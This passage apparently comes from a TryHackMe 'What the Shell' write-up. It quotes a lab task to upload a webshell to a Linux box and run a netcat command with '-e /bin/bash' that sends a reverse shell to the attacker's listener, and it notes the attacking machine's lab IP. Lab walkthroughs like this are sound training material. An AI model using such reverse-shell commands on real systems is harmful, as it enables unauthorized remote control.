d3uk4li0n/writeups/tryhackme-what-the-shell/tryhackme-what-the-shell.md

 *Answer the questions below*

 Try uploading a webshell to the Linux box, then use the command: _nc <LOCAL-IP> <PORT> -e /bin/bash_ to send a reverse shell back to a waiting listener on your own machine.

+We fire up the kali machine, run ifconfig and we see the IP is 10.65.78.242